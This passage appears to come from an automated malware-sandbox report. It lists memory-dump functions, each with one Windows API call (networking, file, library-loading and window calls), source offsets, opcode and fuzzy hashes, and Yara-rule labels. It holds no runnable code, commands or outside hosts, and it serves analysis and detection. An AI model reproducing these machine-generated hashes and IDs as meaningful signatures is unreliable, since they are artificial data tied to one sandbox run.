                                                                      • Opcode ID: c323d9613edecec26019758d53acd4208c3d14b9bdc029f2d16b61126702c369
                                                                      • Instruction ID: 2f395c81474169d9137f85605837e00a222dc940beff02ff9e4b868cd8be6284
                                                                      • Opcode Fuzzy Hash: c323d9613edecec26019758d53acd4208c3d14b9bdc029f2d16b61126702c369
                                                                      • Instruction Fuzzy Hash: 9411A2755097C09FDB138B25DC41E52BFB4EF06224F0980DFED858F163C2659908CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290032, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290091
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: facadf11ecd446872d20e09f7646ad427a0a6ae7f1c972346c8f0d6a52ecc7cb
                                                                      • Instruction ID: 350513fa2709a052134a490d583e20b08386efcf725239617c461c1e527f67c0
                                                                      • Opcode Fuzzy Hash: facadf11ecd446872d20e09f7646ad427a0a6ae7f1c972346c8f0d6a52ecc7cb
                                                                      • Instruction Fuzzy Hash: 4111BF71400204AFEB21CF65DC44F67FFA8EF44720F14846BEE499B251D2B5A4088BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294A52, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFileAttributesW.KERNEL32(?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05294AB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 93a2defd5be6769c1633ace6626f4c708bcc91063bb42f5ea54a1887466178ba
                                                                      • Instruction ID: 9331490ce56c642832df139bdf800ff08eea9575b5ec949b93a91b252efd4281
                                                                      • Opcode Fuzzy Hash: 93a2defd5be6769c1633ace6626f4c708bcc91063bb42f5ea54a1887466178ba
                                                                      • Instruction Fuzzy Hash: 8B1193715083809FDB15CF25DC55B66BFE8EF46220F0884EAED89CB262D274A845CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052901AA, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 05290221
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 770d7d294a69f0b5bf6d30cf52b7abc3e9e29b6277970dbf087d6beb42dad88e
                                                                      • Instruction ID: 7194ab867b6efbf60265417d7b845eedacc9b5d1e4d2eafa10661834e421a579
                                                                      • Opcode Fuzzy Hash: 770d7d294a69f0b5bf6d30cf52b7abc3e9e29b6277970dbf087d6beb42dad88e
                                                                      • Instruction Fuzzy Hash: 1311B671509380AFD311CB15CC45F26FFB8EF86720F19819FED444B692D225B915CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052957B9, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DispatchMessageW.USER32(?), ref: 05295824
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DispatchMessage
                                                                      • String ID:
                                                                      • API String ID: 2061451462-0
                                                                      • Opcode ID: a6a3c3b8441b983110eb3e6da83fa7e6767e0ae622ed58948c2449ce60491b2d
                                                                      • Instruction ID: 1d2a8a4951ddb3f7c5e7ab5034f989f26b5676e8f547a99c7e961f2eff69a028
                                                                      • Opcode Fuzzy Hash: a6a3c3b8441b983110eb3e6da83fa7e6767e0ae622ed58948c2449ce60491b2d
                                                                      • Instruction Fuzzy Hash: 33117C755093C0AFDB138F259C44B62BFB4EF47624F0980DAED898F263D2656848CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05291066, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052910BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 1cf6195cf1452e317c448334bbc908197e12661c28fd68bba8c7c5a3bde68adb
                                                                      • Instruction ID: 995e93c6dc90c0d7f0b7b7f889fc8c8172fe5539bc332b8be383e0a80a9271a0
                                                                      • Opcode Fuzzy Hash: 1cf6195cf1452e317c448334bbc908197e12661c28fd68bba8c7c5a3bde68adb
                                                                      • Instruction Fuzzy Hash: A311E071400240AFEB20CF25DC81F6BFFA8EF45320F14846BEE499B241C2B5A404CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05295504, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05295564
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 1d5eecf9bcfdac9b3459873f8a1c7e86c978853c65b979f7a9341a4f804f8dc0
                                                                      • Instruction ID: 2522fddfc42747d6f7a39a587a946f837fa61c43bfdd24fd72e4a1b740dddf4b
                                                                      • Opcode Fuzzy Hash: 1d5eecf9bcfdac9b3459873f8a1c7e86c978853c65b979f7a9341a4f804f8dc0
                                                                      • Instruction Fuzzy Hash: F911C1715093C09FDB178B25DC54A52BFB4EF07220F0880EBED858F263D269A908CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFA2D6, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNEL32(?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 02AFA32C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: 8291490de7586f2f774cade983f7dbbeb5b3f110997af33313cb70bfa060a11f
                                                                      • Instruction ID: 530dc2628f7a19cc303704862996561c67bef4135c9ed455967de62e8fb99f94
                                                                      • Opcode Fuzzy Hash: 8291490de7586f2f774cade983f7dbbeb5b3f110997af33313cb70bfa060a11f
                                                                      • Instruction Fuzzy Hash: DE119475509380AFDB12CF25DC94B56BFA8EF46220F0884EBED898F653D2759908CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05292F26, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05292F85
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdaptersAddresses
                                                                      • String ID:
                                                                      • API String ID: 2506852604-0
                                                                      • Opcode ID: 07984ea7d9af1dcae3686172e08ef254b0fd11723bb8351a1ae272902f516256
                                                                      • Instruction ID: 013cc0fb034639393fb5b8710d2f33a09fbfc05672d8757f351b78a4585f72b2
                                                                      • Opcode Fuzzy Hash: 07984ea7d9af1dcae3686172e08ef254b0fd11723bb8351a1ae272902f516256
                                                                      • Instruction Fuzzy Hash: 7111AC75500604EEEB21CF15DC85F66FFA8EF05720F1485ABEE495B351C2B5A409CBB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294472, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,00000E2C), ref: 052944DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: ff2aa1febc0ada588fabad51d1bde8f47123afd910d604b2b79b0fd0c8b50867
                                                                      • Instruction ID: 2faf46cf09393b4951257c78c4499504a7c056186153d02cf0125f5865efc5a0
                                                                      • Opcode Fuzzy Hash: ff2aa1febc0ada588fabad51d1bde8f47123afd910d604b2b79b0fd0c8b50867
                                                                      • Instruction Fuzzy Hash: F211E175510200AFEB20EB15DC81FA7FF98EF45720F24849AEE496B381D6F5A5098BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AF2477, Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321719116.0000000002AF2000.00000040.00000001.sdmp, Offset: 02AF2000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >r 2
                                                                      • API String ID: 0-999725458
                                                                      • Opcode ID: 6b1924caaa139641a161f6b75a49295ed8e4014fc8affc66e24e7a92b4859f91
                                                                      • Instruction ID: 81e084ef1f90dadf0bc925de1b886cb525896fee3c1a0963cf38a92969e5cdeb
                                                                      • Opcode Fuzzy Hash: 6b1924caaa139641a161f6b75a49295ed8e4014fc8affc66e24e7a92b4859f91
                                                                      • Instruction Fuzzy Hash: C9A1B35190E7C14FD7D34BF24835394BFB29E5720975A64CBEEC08B1A3D96D0806CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05293506, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RasConnectionNotificationW.RASAPI32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 0529355F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionNotification
                                                                      • String ID:
                                                                      • API String ID: 1402429939-0
                                                                      • Opcode ID: b05279a1ddfcb40b1051bb99f82fd24a66316aefc2687eb431178f45b558504e
                                                                      • Instruction ID: 08c176ccd090093fb0bdf3f9ea0bb264f9e1578da10406a0cbf25133f073466f
                                                                      • Opcode Fuzzy Hash: b05279a1ddfcb40b1051bb99f82fd24a66316aefc2687eb431178f45b558504e
                                                                      • Instruction Fuzzy Hash: A611E171500204AFEB20CB15CC85F66FFA8EF19721F18C86BEE495B341D2B4A408CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529301E, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetPerAdapterInfo.IPHLPAPI(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293077
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdapterInfo
                                                                      • String ID:
                                                                      • API String ID: 3405139893-0
                                                                      • Opcode ID: b05279a1ddfcb40b1051bb99f82fd24a66316aefc2687eb431178f45b558504e
                                                                      • Instruction ID: 0889fca8ba8d50fe0035a09055def103f59014a660e397566963299d5874d489
                                                                      • Opcode Fuzzy Hash: b05279a1ddfcb40b1051bb99f82fd24a66316aefc2687eb431178f45b558504e
                                                                      • Instruction Fuzzy Hash: D711E171500204AFEF20CB15DC85F66FFA8EF55720F14846BEE499B341D2B5A409CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052914A4, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MapViewOfFile.KERNEL32(?,?,?,?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05291504
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 64a609daf274280fad398c71cc02f9ea2fe3b8dd263e6188373d6aeb090586ab
                                                                      • Instruction ID: 86f580efc39cf2aaaf1c934097aad9ddc7c8f2b37ea475ed75471b35fd5bd444
                                                                      • Opcode Fuzzy Hash: 64a609daf274280fad398c71cc02f9ea2fe3b8dd263e6188373d6aeb090586ab
                                                                      • Instruction Fuzzy Hash: DD119071405380AFDB22CF65DC44A62FFF4EF46220F09859AED898B262C275A519DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFA078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: recv
                                                                      • String ID:
                                                                      • API String ID: 1507349165-0
                                                                      • Opcode ID: 75315d21e880c4edf21226fc9d4061021d1a9c92e337b93e69edfa0e2f624e7e
                                                                      • Instruction ID: 0e0b5408fe57379562a8aab55d4d940eedd8218c9720635681f043f144f9f70a
                                                                      • Opcode Fuzzy Hash: 75315d21e880c4edf21226fc9d4061021d1a9c92e337b93e69edfa0e2f624e7e
                                                                      • Instruction Fuzzy Hash: D4118F71549380AFDB22CF65DC44B52FFB4EF46224F08C49AEE898B162C275A918CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294F22, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CopyFileW.KERNEL32(?,?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05294F6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CopyFile
                                                                      • String ID:
                                                                      • API String ID: 1304948518-0
                                                                      • Opcode ID: 3449c10754a915facd6c2647e9867164c2f2bf5c838e4bc4358478cc62631db5
                                                                      • Instruction ID: 067738e5b6f6302ee2d33cee11b83bb210c167841f7009165dacf75c352df835
                                                                      • Opcode Fuzzy Hash: 3449c10754a915facd6c2647e9867164c2f2bf5c838e4bc4358478cc62631db5
                                                                      • Instruction Fuzzy Hash: E4118271A102029FDF24DF29D845B66FBD8FF44210F1884AADD49CB351D670D405CAA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05292847, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,?,?,?), ref: 052928A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: fb6507dd0bb02453ffd050b91dd5ce21acb9f1ac09db8926bdf3fd9fbb45272d
                                                                      • Instruction ID: e4e0539a0ff221c33efe9837981bc08e29ae9fea933c4d3c62aebea55dee8d7d
                                                                      • Opcode Fuzzy Hash: fb6507dd0bb02453ffd050b91dd5ce21acb9f1ac09db8926bdf3fd9fbb45272d
                                                                      • Instruction Fuzzy Hash: 13118F75409384AFDB228B25DC44A62FFB4EF06220F0885DAED854B662D265A818DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFBD42, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileType.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFBD95
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID:
                                                                      • API String ID: 3081899298-0
                                                                      • Opcode ID: 8e7abc776c7b7435cbe4cc35007d9565141f747130ba985e298170d9169c9fc8
                                                                      • Instruction ID: 566420deb48f6e9d32c9671967468fac0d50852ab88f1c06609585b67fd5f041
                                                                      • Opcode Fuzzy Hash: 8e7abc776c7b7435cbe4cc35007d9565141f747130ba985e298170d9169c9fc8
                                                                      • Instruction Fuzzy Hash: 5F01D272500704AEE750DB55DC85F67FFA8EF49724F148497EE459B241CAB8A408CAB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052921CA, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 05292215
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ExtentPoint32Text
                                                                      • String ID:
                                                                      • API String ID: 223599850-0
                                                                      • Opcode ID: 88a420555d75a65b67a4a899ae4f60d76cd1a4df335142e611518b62959a026a
                                                                      • Instruction ID: b9a3880f419326574d42049a4b086d7a6a5ab3ee7fa2e27f1c6a837900ee495c
                                                                      • Opcode Fuzzy Hash: 88a420555d75a65b67a4a899ae4f60d76cd1a4df335142e611518b62959a026a
                                                                      • Instruction Fuzzy Hash: 7B118E75910240EFEB20CF25D884B66FFE8FF04620F08C4AADD498B316D675E404CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05293E02, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05293E4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Connect
                                                                      • String ID:
                                                                      • API String ID: 3144859779-0
                                                                      • Opcode ID: 63a311966c051e537265c5f70d027de292f35f30299912ab9097549af1433104
                                                                      • Instruction ID: dbb1ac722079c1eb758918878aeb695f184f0323f762e037dc5ccf31cadfe1e7
                                                                      • Opcode Fuzzy Hash: 63a311966c051e537265c5f70d027de292f35f30299912ab9097549af1433104
                                                                      • Instruction Fuzzy Hash: A3117071510644AFDB20CF55D844B62FFE5FF48710F08896EDE898B622D371E818DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294A76, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFileAttributesW.KERNEL32(?,?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05294AB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 30c44ed04de33a06baeb3280ae5068823ef97ba222209d43afc0c7181cde4324
                                                                      • Instruction ID: 119def0eece627b5ae9e67d0683075fb48d30a6b1cd8b972ffec2d0c53319722
                                                                      • Opcode Fuzzy Hash: 30c44ed04de33a06baeb3280ae5068823ef97ba222209d43afc0c7181cde4324
                                                                      • Instruction Fuzzy Hash: B8018C71A142019FEF14DF29D885766FFD8FF44220F1884AAED49CB352D6B5E805CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFA9F0, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,?,?), ref: 02AFAA4A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LongWindow
                                                                      • String ID:
                                                                      • API String ID: 1378638983-0
                                                                      • Opcode ID: 146562c45a3dadf2c9929e23f78481b0189aebf21bef5448a81c7475f81db4f6
                                                                      • Instruction ID: a572eb4beeeb11a0704471b96f73f5fd41b04668c2f2c7a9189bde8d2c2d4972
                                                                      • Opcode Fuzzy Hash: 146562c45a3dadf2c9929e23f78481b0189aebf21bef5448a81c7475f81db4f6
                                                                      • Instruction Fuzzy Hash: D111A031408384AFC721CF55DC84B52FFF4EF06220F08C09AEE894B262C375A808CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529141E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 0529146E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      • Opcode ID: adcdda7d324c9720676a87d95464e2d1cc17647704188c436c21dc3fc83e7269
                                                                      • Instruction ID: 15c15a60eb0f472df1fe879299d6f9ed38d15d6e505b0e67816ed220bfa4267c
                                                                      • Opcode Fuzzy Hash: adcdda7d324c9720676a87d95464e2d1cc17647704188c436c21dc3fc83e7269
                                                                      • Instruction Fuzzy Hash: C901B172900200ABD710DF16DC82F26FBA8FBC8B20F14812AED088B741E331B915CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529327E, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FormatMessageW.KERNEL32(?,00000E2C,?,?), ref: 052932CE
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FormatMessage
                                                                      • String ID:
                                                                      • API String ID: 1306739567-0
                                                                      • Opcode ID: 6fce8199eadb384de971922a57256c97496698c4b45abcc20a713fe11c1a4330
                                                                      • Instruction ID: 12ab039ce4952f4059ba171df1408851951a96389783f855f136157635b61274
                                                                      • Opcode Fuzzy Hash: 6fce8199eadb384de971922a57256c97496698c4b45abcc20a713fe11c1a4330
                                                                      • Instruction Fuzzy Hash: 2801B172900200ABD710DF16DC82F26FBA8FBC8B20F14812AED088B741E331B915CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052952DA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 0529532A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileModuleName
                                                                      • String ID:
                                                                      • API String ID: 514040917-0
                                                                      • Opcode ID: a3561d2abf2ac8fa029bd387d6f692d53694309eefa31733b61d83167ca27548
                                                                      • Instruction ID: f067c23f4878ff10933623593baebfe86e8cd653e946082cce379b0fe2d7c694
                                                                      • Opcode Fuzzy Hash: a3561d2abf2ac8fa029bd387d6f692d53694309eefa31733b61d83167ca27548
                                                                      • Instruction Fuzzy Hash: B8017172940600ABD710DF16DC86F26FBA8FBC8B20F14856AED089B741E771B915CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFA172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • gethostname.WS2_32(?,00000E2C,?,?), ref: 02AFA1C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: gethostname
                                                                      • String ID:
                                                                      • API String ID: 144339138-0
                                                                      • Opcode ID: 85551041b1b6bda89bf49ef29e21d54da4c9bb18bc50db10468c10448306d661
                                                                      • Instruction ID: 7d29d4408c95cb0b699dbbfa956ba46576ac462acb782f8a267dc15ff0ca9502
                                                                      • Opcode Fuzzy Hash: 85551041b1b6bda89bf49ef29e21d54da4c9bb18bc50db10468c10448306d661
                                                                      • Instruction Fuzzy Hash: 0801B171900200ABD710DF16DC82F26FBA8FBC8A20F14816AED088B741E331B915CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05291A9E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05291AE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoadShim
                                                                      • String ID:
                                                                      • API String ID: 1475914169-0
                                                                      • Opcode ID: 6f43fe201ea932058ae62dc92be204aef8ed2967651696db580f5b57054865f0
                                                                      • Instruction ID: 447ec401bd39f051999eadc864a93517e0f6959d25045eac2186f3f7064d8ae5
                                                                      • Opcode Fuzzy Hash: 6f43fe201ea932058ae62dc92be204aef8ed2967651696db580f5b57054865f0
                                                                      • Instruction Fuzzy Hash: B7019E716107059FDB20CF1AD885B22FFE8FF44620F08809ADD498B316D2B1E818CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFA5D6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02AFA61A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: c46afb6aa896b82fff34ead37eb2307bdfd659d47c269a62f5dd38483358f740
                                                                      • Instruction ID: efc6236fdb011f60ff805d48c3191c7c9340a42153cd77c8ee025c86a7fc6a36
                                                                      • Opcode Fuzzy Hash: c46afb6aa896b82fff34ead37eb2307bdfd659d47c269a62f5dd38483358f740
                                                                      • Instruction Fuzzy Hash: 6C015B71400640AFDB61CF95D884B66FFE0EF48720F18C5AAEE494B612D676A418DF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529210A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 0529215A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ConnectionsEnum
                                                                      • String ID:
                                                                      • API String ID: 3832085198-0
                                                                      • Opcode ID: be5c4a0d5e0e415dcfedda97f133c6786aad8a78b9802e752a7ec92db85e2d6e
                                                                      • Instruction ID: ddd288ad2946076c5e0a7fea064d3ea599f4ef49e4d451a548fcdf15af7dff34
                                                                      • Opcode Fuzzy Hash: be5c4a0d5e0e415dcfedda97f133c6786aad8a78b9802e752a7ec92db85e2d6e
                                                                      • Instruction Fuzzy Hash: 63018F72500600ABD210DF16DC82F26FBA8FB88B20F14811AED084B741E371B915CAA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052901D6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 05290221
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
